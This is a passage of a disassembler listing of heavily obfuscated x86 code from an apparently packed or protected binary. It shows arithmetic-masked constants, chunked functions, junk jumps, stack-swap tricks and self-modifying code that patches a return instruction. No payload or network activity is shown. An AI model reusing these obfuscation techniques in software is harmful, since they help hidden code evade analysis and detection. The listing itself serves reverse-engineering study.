; FUNCTION CHUNK AT 0043EDD8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044223F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00442750 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004446EA SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00450919 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00453878 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00456834 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045AE3A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045B2CB SIZE 00000006 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jz	loc_43EA07
		jmp	loc_450919
sub_44346B	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_44347E:				; CODE XREF: y2kk37jd:loc_4495D9j
		inc	dword ptr [ebp-20h]
; START	OF FUNCTION CHUNK FOR sub_452458

loc_443481:				; CODE XREF: sub_452458+Aj
		mov	eax, [ebp-1Ch]
		and	eax, 0FFh
		mov	eax, ds:dword_44981C[eax*4]
		mov	[ebp-8], eax
; END OF FUNCTION CHUNK	FOR sub_452458
; START	OF FUNCTION CHUNK FOR sub_44D302

loc_443493:				; CODE XREF: sub_44D302+5169j
					; sub_44D302+9CA5j
		jno	loc_45431B
		test	byte ptr [ebp-8], 2
		jz	loc_450848
		jmp	loc_43EDDD
; END OF FUNCTION CHUNK	FOR sub_44D302
; ---------------------------------------------------------------------------
		push	0AAB230AFh
		pop	eax

loc_4434AE:				; CODE XREF: y2kk37jd:loc_442304j
		rol	eax, 2
		sub	eax, 0D822DB5Eh
		xor	eax, 3D3A9A61h
		call	sub_442C3E
		jmp	loc_449DDA
; ---------------------------------------------------------------------------

loc_4434C7:				; CODE XREF: y2kk37jd:004558A7j
		jbe	loc_456880

; =============== S U B	R O U T	I N E =======================================



sub_4434CD	proc near		; CODE XREF: y2kk37jd:0045013Dp

; FUNCTION CHUNK AT 00453D0E SIZE 00000014 BYTES

		xchg	esi, [esp+0]
		pop	esi
		mov	ds:dword_446650, eax
		mov	eax, [ebp-0Ch]
		jmp	loc_453D0E
sub_4434CD	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_415. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_4434DF:				; CODE XREF: y2kk37jd:004588F6j
		mov	[edi], eax
		xchg	ecx, [esp]
		mov	edi, ecx
		pop	ecx
		lea	eax, nullsub_451
		jmp	loc_43E633
; ---------------------------------------------------------------------------

loc_4434F2:				; DATA XREF: sub_43F346+2Bo
		sub	eax, 135789A2h
		ror	eax, 1Ch
		add	eax, 0CE6505ABh
		xor	eax, 0C9DC29D8h
		js	loc_43FC23
		add	eax, 31E8B93Fh
		push	offset sub_44B613
		jmp	loc_43DEF8
; ---------------------------------------------------------------------------

loc_44351D:				; DATA XREF: sub_43C851:loc_454013o
		jmp	loc_450BF2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C851

loc_443522:				; CODE XREF: sub_453867-15906j
					; sub_43C851+15AD8j
		pop	ecx
		pop	ebp
		retn
; END OF FUNCTION CHUNK	FOR sub_43C851

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_443525	proc near		; CODE XREF: y2kk37jd:004432F8j
					; sub_44B117:loc_449FD0j ...

var_4		= dword	ptr -4
arg_0		= dword	ptr  8

; FUNCTION CHUNK AT 0043B7DA SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0043EFD6 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0043FC6F SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044CDBE SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044E162 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044EBA3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453EB4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454D02 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004552AF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045573C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045A826 SIZE 00000005 BYTES

		push	ebp
		mov	ebp, esp
		jmp	loc_44EBA3
sub_443525	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B7AA

loc_44352D:				; CODE XREF: sub_45B7AA:loc_449075j
		jg	loc_44E34D
		jl	loc_446D19
; END OF FUNCTION CHUNK	FOR sub_45B7AA
; START	OF FUNCTION CHUNK FOR sub_453867

loc_443539:				; CODE XREF: sub_453867:loc_449068j
		xor	esi, 28D6BE99h
		add	esi, 0A08FE23Bh
		xchg	esi, [esp+14h+var_14]
		jmp	sub_44884D
; END OF FUNCTION CHUNK	FOR sub_453867
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B2FD

loc_44354D:				; CODE XREF: sub_43B2FD:loc_43B302j
		or	eax, eax
		jnz	loc_43DB0C
		jmp	loc_4425AE
; END OF FUNCTION CHUNK	FOR sub_43B2FD

; =============== S U B	R O U T	I N E =======================================



sub_44355A	proc near		; CODE XREF: y2kk37jd:0045645Cj
					; y2kk37jd:0045BD98p

; FUNCTION CHUNK AT 0045C502 SIZE 00000008 BYTES

		xchg	edi, [esp+0]
		pop	edi
		mov	[edx], eax
		pop	edx
		lea	eax, nullsub_492
		jmp	loc_45C502
sub_44355A	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43ED19

loc_44356C:				; CODE XREF: sub_43ED19+4007j
					; sub_440D56:loc_44D8FBj
		push	116832E6h
		pop	eax
		rol	eax, 6
		add	eax, 0DFB68B36h
		and	eax, 0CE5A56E4h
		sub	eax, 0D34A50A2h
		push	offset loc_441D39
		jmp	nullsub_398
; END OF FUNCTION CHUNK	FOR sub_43ED19
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4408B9

loc_443591:				; CODE XREF: sub_4408B9:loc_4408C5j
		pop	eax
		xor	eax, 6A869B3h
		add	eax, 0A6376475h
		mov	eax, [eax]
		jmp	loc_458968
; END OF FUNCTION CHUNK	FOR sub_4408B9
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CC31

loc_4435A6:				; CODE XREF: sub_44CC31+9F57j
		push	edx
		mov	edx, ebp
		xchg	edx, [esp+8+var_8]
		mov	ebp, esp
		add	esp, 0FFFFF7ECh
		jmp	loc_441135
; END OF FUNCTION CHUNK	FOR sub_44CC31

; =============== S U B	R O U T	I N E =======================================



sub_4435B9	proc near		; DATA XREF: sub_4550D4+3o

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00451475 SIZE 0000000B BYTES

		push	ecx
		mov	esp, ebp
		xchg	esi, [esp+4+var_4]
		push	esi
		pop	ebp
		pop	esi
		mov	eax, ds:dword_447324
		or	eax, eax
		jmp	loc_451475
sub_4435B9	endp

; ---------------------------------------------------------------------------

loc_4435CF:				; CODE XREF: y2kk37jd:00451560j
		jz	loc_43D53C
; START	OF FUNCTION CHUNK FOR sub_44DC38

loc_4435D5:				; CODE XREF: sub_44DC38+97B2j
		jmp	loc_442C37
; END OF FUNCTION CHUNK	FOR sub_44DC38
; ---------------------------------------------------------------------------
		cdq
		mov	[ebp+0], ebx
		jnp	loc_45918C
		jo	loc_453451
		jmp	loc_43D53C
; ---------------------------------------------------------------------------
		push	esi
		push	7BC465DEh
		pop	esi
		rol	esi, 15h
		and	esi, 0F0D95FF7h
		test	esi, 8000000h
		jmp	loc_458495
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_157. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_44360B:				; CODE XREF: sub_445226-6F16j
		jmp	nullsub_407
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D6BF

loc_443610:				; CODE XREF: sub_44D6BF+33ECj
					; y2kk37jd:loc_4524D5j
		jz	loc_448D38
		jmp	loc_45177C
; END OF FUNCTION CHUNK	FOR sub_44D6BF
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_302. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_44361C:				; CODE XREF: y2kk37jd:00453FE4j
		jmp	loc_454CE9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44610D

loc_443621:				; CODE XREF: sub_44610D:loc_45779Fj
		jnz	loc_43E990
		jmp	loc_456C5B
; END OF FUNCTION CHUNK	FOR sub_44610D

; =============== S U B	R O U T	I N E =======================================



sub_44362C	proc near		; CODE XREF: y2kk37jd:00444364j
					; y2kk37jd:0045BF90p
		xchg	ecx, [esp+0]
		pop	ecx
		add	eax, 6D388BA8h
sub_44362C	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_445CC9

loc_443636:				; CODE XREF: sub_445CC9:loc_43E613j
		add	eax, 92C774C0h
		jmp	loc_456A47
; END OF FUNCTION CHUNK	FOR sub_445CC9
; ---------------------------------------------------------------------------

loc_443641:				; CODE XREF: y2kk37jd:loc_4557CDj
		pop	edx
		xor	edx, 0CBFBFB83h
		push	offset sub_44E73B
		jmp	locret_44734D
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_360. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449E69

loc_443653:				; CODE XREF: sub_449E69:loc_4448D8j
		jl	loc_45899B
		jmp	loc_452034
; END OF FUNCTION CHUNK	FOR sub_449E69

; =============== S U B	R O U T	I N E =======================================



sub_44365E	proc near		; DATA XREF: y2kk37jd:00449166o

; FUNCTION CHUNK AT 0043EEAB SIZE 00000005 BYTES

		mov	ds:off_41E054, eax
		lea	eax, sub_4587AA
		push	offset sub_4579F3
		jmp	loc_43EEAB
sub_44365E	endp


; =============== S U B	R O U T	I N E =======================================



sub_443674	proc near		; CODE XREF: y2kk37jd:00445C58j
					; y2kk37jd:0045B09Bp
		xchg	edi, [esp+0]
		pop	edi
		jnz	loc_4585F2
		jmp	loc_440EB7
sub_443674	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44966C

loc_443683:				; CODE XREF: sub_44966C:loc_43D958j
		jmp	loc_45AE3F
; END OF FUNCTION CHUNK	FOR sub_44966C

; =============== S U B	R O U T	I N E =======================================



sub_443688	proc near		; CODE XREF: y2kk37jd:loc_442BD6j
					; y2kk37jd:004472D9p ...

; FUNCTION CHUNK AT 0043BFCC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004415A9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00442BDB SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004502B3 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00453CED SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0045BB45 SIZE 00000005 BYTES

		mov	edx, 1
		lock xchg edx, [eax]
		jmp	loc_4415A9
sub_443688	endp


; =============== S U B	R O U T	I N E =======================================



sub_443695	proc near		; DATA XREF: sub_44B86B+93DEo

; FUNCTION CHUNK AT 004530C1 SIZE 00000017 BYTES

		mov	[edi], eax
		xchg	eax, [esp+0]
		call	sub_4436FA

loc_44369F:				; CODE XREF: y2kk37jd:00443DDCj
		jmp	loc_4530C1
sub_443695	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45447D

loc_4436A4:				; CODE XREF: sub_45447D-C81Fj
					; sub_45447D:loc_44DBA8j
		lea	eax, [ebp-2BBh]
		cmp	dword ptr [eax], 47424454h
		jz	loc_44D915
		jmp	loc_44F34B
; END OF FUNCTION CHUNK	FOR sub_45447D
; ---------------------------------------------------------------------------

loc_4436BB:				; CODE XREF: y2kk37jd:0043B86Dj
		jnz	loc_4588B9

; =============== S U B	R O U T	I N E =======================================



sub_4436C1	proc near		; CODE XREF: sub_444DF4+101D2p

; FUNCTION CHUNK AT 00444011 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0045265D SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0045965C SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		pop	eax
		cmp	ds:dword_44FC88[eax*4],	0
		jz	loc_45265D
		mov	eax, [ebp-4]
		jmp	loc_45965C
sub_4436C1	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443BAF

loc_4436DB:				; CODE XREF: sub_443BAF+2725j
		push	eax
		retn
; END OF FUNCTION CHUNK	FOR sub_443BAF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43ED86

loc_4436DD:				; CODE XREF: sub_43ED86+14E68j
		jmp	loc_44F1BA
; END OF FUNCTION CHUNK	FOR sub_43ED86
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C851

loc_4436E2:				; CODE XREF: sub_43C851+164A5j
		jmp	loc_43EAD6
; END OF FUNCTION CHUNK	FOR sub_43C851

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4436E7	proc near		; CODE XREF: sub_43BD49+4p
					; sub_44B814+5p ...

var_10		= dword	ptr -10h

; FUNCTION CHUNK AT 0043FAC7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044ACAE SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044B374 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0044D6D8 SIZE 00000005 BYTES

		push	ebp
		mov	ebp, esp
		js	sub_44D3D0
		add	esp, 0FFFFFFF8h
		push	ebx
		push	eax
		jmp	loc_43FAC7
sub_4436E7	endp


; =============== S U B	R O U T	I N E =======================================



sub_4436FA	proc near		; CODE XREF: sub_443695+5p
					; y2kk37jd:00452701j
		xchg	ecx, [esp+0]
		pop	ecx
		mov	edi, eax
		pop	eax
		lea	eax, sub_44B86B
		mov	byte ptr [eax],	0C3h
		jmp	sub_44B86B
sub_4436FA	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B86B

loc_44370F:				; CODE XREF: sub_44B86Bj
		xchg	edi, [esp-4+arg_0]
		mov	edx, edi
		jmp	loc_4491E4
; END OF FUNCTION CHUNK	FOR sub_44B86B
; ---------------------------------------------------------------------------

loc_443719:				; CODE XREF: y2kk37jd:00440C1Dj
		jp	loc_448739
		or	ebx, ebp
		jmp	loc_456461
; ---------------------------------------------------------------------------

loc_443726:				; CODE XREF: y2kk37jd:004413CCj
					; y2kk37jd:loc_444350j
		lea	eax, [ebp-25Ch]
		cmp	dword ptr [eax], 47424454h
		jnz	loc_458D82
		jmp	loc_442ECC
; ---------------------------------------------------------------------------
		mov	edx, 0BD91ED44h
		call	sub_440CD1
		push	eax
		ror	eax, 18h
		push	esi
		jmp	loc_458F06
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A783

loc_443751:				; CODE XREF: sub_45A783:loc_44495Bj
		pop	edx
		rol	edx, 2
; END OF FUNCTION CHUNK	FOR sub_45A783
; START	OF FUNCTION CHUNK FOR sub_45689F

loc_443755:				; CODE XREF: sub_45689F-18369j
		jnb	loc_43DB40
; END OF FUNCTION CHUNK	FOR sub_45689F
; START	OF FUNCTION CHUNK FOR sub_44A8B6

loc_44375B:				; CODE XREF: sub_43E1E9:loc_444615j
					; sub_44A8B6+1Aj
		jmp	loc_43C8FF
; END OF FUNCTION CHUNK	FOR sub_44A8B6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44438E

loc_443760:				; CODE XREF: sub_44438E+18j
		jmp	loc_451F0B
; END OF FUNCTION CHUNK	FOR sub_44438E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440E51

loc_443765:				; CODE XREF: sub_440E51+7j
		jmp	sub_45AAD1
; END OF FUNCTION CHUNK	FOR sub_440E51
; ---------------------------------------------------------------------------

loc_44376A:				; CODE XREF: y2kk37jd:00440B0Bj
		jmp	locret_454583
; ---------------------------------------------------------------------------
		adc	eax, ecx
		cdq
		test	edx, 0EE964F0Fh
		jmp	loc_44A754
; ---------------------------------------------------------------------------
		test	eax, eax
		jz	loc_446334
		jmp	loc_44835E
; ---------------------------------------------------------------------------

loc_44378A:				; CODE XREF: y2kk37jd:0045C461j
		push	55DC5704h
; START	OF FUNCTION CHUNK FOR sub_443360

loc_44378F:				; CODE XREF: sub_443360:loc_45C450j
		rol	eax, 4
		and	eax, 40C4FCA3h
		or	eax, 1DEE0620h
		add	eax, 0A2564DA2h
		mov	eax, [eax]
		jmp	loc_44D967
; END OF FUNCTION CHUNK	FOR sub_443360
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D6A5

loc_4437AB:				; CODE XREF: sub_44D6A5+6j
		or	eax, eax
		jnz	loc_449365
		jmp	loc_4417C3
; END OF FUNCTION CHUNK	FOR sub_44D6A5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458713

loc_4437B8:				; CODE XREF: sub_458713:loc_44AF01j
		popf
		xchg	edi, [esp-4+arg_0]
		jmp	sub_440CD1
; END OF FUNCTION CHUNK	FOR sub_458713
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45689F

loc_4437C1:				; CODE XREF: sub_45689F:loc_450404j
					; y2kk37jd:00450420j
		xor	edi, 26A0B6CAh
		rol	edi, 15h
		add	edi, 8F012452h
		mov	[edi], eax
		pop	edi
		call	sub_43B06A
; END OF FUNCTION CHUNK	FOR sub_45689F
; START	OF FUNCTION CHUNK FOR sub_43ED19

loc_4437D8:				; CODE XREF: sub_43ED19+108BDj
		jmp	loc_4525A9
; END OF FUNCTION CHUNK	FOR sub_43ED19
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CF31

loc_4437DD:				; CODE XREF: sub_43CF31+3621j
		jmp	nullsub_36
; END OF FUNCTION CHUNK	FOR sub_43CF31
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_523. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458101

loc_4437E3:				; CODE XREF: sub_458101+13j
		jmp	loc_43E6B8
; END OF FUNCTION CHUNK	FOR sub_458101
; ---------------------------------------------------------------------------

loc_4437E8:				; CODE XREF: y2kk37jd:00456451j
		jmp	loc_44900D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453849

loc_4437ED:				; CODE XREF: sub_453849-179AFj
		jmp	sub_454413
; END OF FUNCTION CHUNK	FOR sub_453849
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446718

loc_4437F2:				; CODE XREF: sub_446718:loc_452C40j
		or	eax, 91A646DFh
		add	eax, 0DAD99016h
		xor	eax, 8D8C3AE6h
		cmp	eax, 0EE2237E7h
		jmp	loc_4510D1
; END OF FUNCTION CHUNK	FOR sub_446718
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B663

loc_44380F:				; CODE XREF: sub_44B663:loc_44B672j
		xchg	esi, [esp+0]
		mov	edx, esi
		xchg	edx, [esp+0]
		mov	esi, edx
		pop	edx
; END OF FUNCTION CHUNK	FOR sub_44B663
; START	OF FUNCTION CHUNK FOR sub_445226

loc_44381A:				; CODE XREF: sub_445226+A80Dj
		jmp	loc_448105
; END OF FUNCTION CHUNK	FOR sub_445226
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_337. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456BAC

loc_443820:				; CODE XREF: sub_456BAC-11310j
		jmp	loc_455C9C
; END OF FUNCTION CHUNK	FOR sub_456BAC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4444CA

loc_443825:				; CODE XREF: sub_4444CA+67Bj
		jmp	sub_4417E6
; END OF FUNCTION CHUNK	FOR sub_4444CA
; ---------------------------------------------------------------------------

loc_44382A:				; CODE XREF: y2kk37jd:00441105j
		jmp	sub_442C3E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_376. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_443830:				; CODE XREF: y2kk37jd:0043B26Bj
		pop	ebx

; =============== S U B	R O U T	I N E =======================================



sub_443831	proc near		; CODE XREF: sub_43B67C+9p
					; y2kk37jd:loc_44B249j

; FUNCTION CHUNK AT 0043D481 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043F3DE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A51F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045A576 SIZE 00000005 BYTES

		xchg	edx, [esp+0]
		pop	edx

loc_443835:				; CODE XREF: sub_442A84:loc_4598DEj
		cmp	al, 0A4h
		jmp	loc_43D481
sub_443831	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F346

loc_44383C:				; CODE XREF: sub_43F346-6B5j
		xor	eax, 6BE53C99h
		add	eax, 9661690Bh
		mov	eax, [eax]
		or	eax, eax
		jnz	loc_43F3B5
		jmp	loc_442824
; END OF FUNCTION CHUNK	FOR sub_43F346
; ---------------------------------------------------------------------------
		sub	edi, 506A0945h
		mov	[eax], esi
		jmp	sub_4545F7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456809

loc_443864:				; CODE XREF: sub_456809:loc_4408AFj
		jnz	loc_43D15A
		jmp	loc_455FFB
; END OF FUNCTION CHUNK	FOR sub_456809
; ---------------------------------------------------------------------------

loc_44386F:				; CODE XREF: y2kk37jd:0043F541j
		pop	esi
; START	OF FUNCTION CHUNK FOR sub_443BAF

loc_443870:				; CODE XREF: sub_443BAF+1445Aj
		xor	eax, 40D6EC69h

loc_443876:				; CODE XREF: sub_445787:loc_43EE80j
		add	eax, 23EA6287h
		rol	eax, 9
		mov	ds:dword_4447DC, eax

loc_443885:				; CODE XREF: sub_45A961-1505Dj
					; sub_45A961+Ej
		ror	eax, 9
		push	esi
		push	0E5DE5A58h
		jmp	loc_4420FD
; END OF FUNCTION CHUNK	FOR sub_443BAF
; ---------------------------------------------------------------------------
		mov	eax, [esp]
		call	sub_4526B7
		retn
; ---------------------------------------------------------------------------

loc_44389C:				; CODE XREF: y2kk37jd:loc_453515j
		jmp	loc_44D810
; ---------------------------------------------------------------------------

loc_4438A1:				; CODE XREF: y2kk37jd:0045145Fj
		jmp	loc_43B725
; ---------------------------------------------------------------------------
		dw 7215h
dword_4438A8	dd 0			; DATA XREF: sub_4458DD+6r
					; sub_4458DD:loc_4482B6r
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_4438AC:				; CODE XREF: sub_445226+283j
		jmp	loc_45937C
; END OF FUNCTION CHUNK	FOR sub_445226

; =============== S U B	R O U T	I N E =======================================



sub_4438B1	proc near		; CODE XREF: sub_414954+142p
					; sub_417B4D+31p
					; DATA XREF: ...

; FUNCTION CHUNK AT 0043B747 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0043C260 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043D6F5 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 00442664 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044554C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447947 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B183 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 0044B56E SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044C63B SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044E58D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453D34 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456967 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004575A6 SIZE 00000013 BYTES

		jb	loc_4575A6
		jmp	loc_44554C
sub_4438B1	endp

; ---------------------------------------------------------------------------

loc_4438BC:				; CODE XREF: y2kk37jd:00441FFDj
		test	ebp, ecx
		jmp	loc_43CCEF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C4BC

loc_4438C3:				; CODE XREF: sub_44C4BC+1DE9j
		cdq
		jmp	loc_458C75
; END OF FUNCTION CHUNK	FOR sub_44C4BC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442081

loc_4438C9:				; CODE XREF: sub_442081:loc_45C1E3j
		sub	al, 99h
		push	0D150285Bh
		pop	edx
		or	edx, 0EF2B7F45h
		sub	edx, ds:4000F0h
		jmp	loc_44DDC8
; END OF FUNCTION CHUNK	FOR sub_442081
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_4438E2:				; CODE XREF: sub_445226+13037j
					; sub_445226:loc_459C5Dj
		call	sub_455D37
; END OF FUNCTION CHUNK	FOR sub_445226
; START	OF FUNCTION CHUNK FOR sub_44B508

loc_4438E7:				; CODE XREF: sub_44B508+Dj
		jmp	loc_44470B
; END OF FUNCTION CHUNK	FOR sub_44B508
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AAA1

loc_4438EC:				; CODE XREF: sub_44AAA1:loc_45208Fj
		jz	loc_452E0B
		jmp	loc_4496B1
; END OF FUNCTION CHUNK	FOR sub_44AAA1
; ---------------------------------------------------------------------------
		mov	eax, 64C2366Ah
		popf
		jmp	sub_43F4E7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445C40

loc_443902:				; CODE XREF: sub_445C40+10j
		call	sub_4448E2
		mov	eax, 3E69A3C2h
		call	sub_44113A
		mov	ds:off_41E014, eax
		lea	eax, sub_445C40
		jmp	loc_441528
; END OF FUNCTION CHUNK	FOR sub_445C40
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DED9

loc_443922:				; CODE XREF: sub_44DED9-80EDj
					; sub_44DED9:loc_44DA28j
		call	nullsub_7
		retn
; END OF FUNCTION CHUNK	FOR sub_44DED9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BF31

loc_443928:				; CODE XREF: sub_43BF31+F3BAj
		jmp	nullsub_114
; END OF FUNCTION CHUNK	FOR sub_43BF31
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_7. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CF38

loc_44392E:				; CODE XREF: sub_44CF38+2101j
		jmp	loc_44E27B
; END OF FUNCTION CHUNK	FOR sub_44CF38
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DED9

loc_443933:				; CODE XREF: sub_44DED9:loc_446D28j
		call	sub_4577FE
		jmp	loc_44DA50
; END OF FUNCTION CHUNK	FOR sub_44DED9
; ---------------------------------------------------------------------------

loc_44393D:				; CODE XREF: y2kk37jd:0044FA67j
		adc	edi, ebp
; START	OF FUNCTION CHUNK FOR sub_43F0A5

loc_44393F:				; CODE XREF: sub_43F0A5+1BAE7j
		and	edx, 748EB08Ch
		sub	edx, 75F5CCCFh
		jnz	loc_452987
; END OF FUNCTION CHUNK	FOR sub_43F0A5
; START	OF FUNCTION CHUNK FOR sub_43C335

loc_443951:				; CODE XREF: sub_43C335+15DEDj
		jmp	loc_4580BA
; END OF FUNCTION CHUNK	FOR sub_43C335
; ---------------------------------------------------------------------------
		sub	edx, ebx
		jmp	loc_452981
; ---------------------------------------------------------------------------

loc_44395D:				; DATA XREF: sub_45354C:loc_44F97Ao
		mov	eax, ds:dword_446BDC
		or	eax, eax
		jnz	loc_455AFC
		jmp	loc_456CD3
; ---------------------------------------------------------------------------

locret_443970:				; CODE XREF: y2kk37jd:004456F1j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457FCC

loc_443971:				; CODE XREF: sub_457FCC+6j
		jmp	nullsub_231
; END OF FUNCTION CHUNK	FOR sub_457FCC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F2F2

loc_443976:				; CODE XREF: sub_43F2F2+FC8Dj
		jmp	loc_455207
; END OF FUNCTION CHUNK	FOR sub_43F2F2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456990

loc_44397B:				; CODE XREF: sub_456990:loc_443A2Aj
					; y2kk37jd:00456851j
		xor	ebx, ds:4000EEh
		or	ebx, 7822259Ch
		cmp	ebx, 9CF09A25h
		jmp	loc_45B888
; END OF FUNCTION CHUNK	FOR sub_456990

; =============== S U B	R O U T	I N E =======================================



sub_443992	proc near		; CODE XREF: y2kk37jd:0044933Dj
					; y2kk37jd:0044AF42p
		xchg	edi, [esp+0]
		pop	edi
		jmp	loc_44474B
sub_443992	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		jmp	loc_44457F
; ---------------------------------------------------------------------------

loc_4439A0:				; CODE XREF: y2kk37jd:00459C6Aj
		call	sub_4577FE
		test	al, al
		jmp	loc_45BF09
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F8B8

loc_4439AC:				; CODE XREF: sub_43F8B8+FBB3j
		jns	loc_454CFD
		sbb	ebx, ebp
		jmp	loc_44267A
; END OF FUNCTION CHUNK	FOR sub_43F8B8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45136B

loc_4439B9:				; CODE XREF: sub_45136B-F3F4j
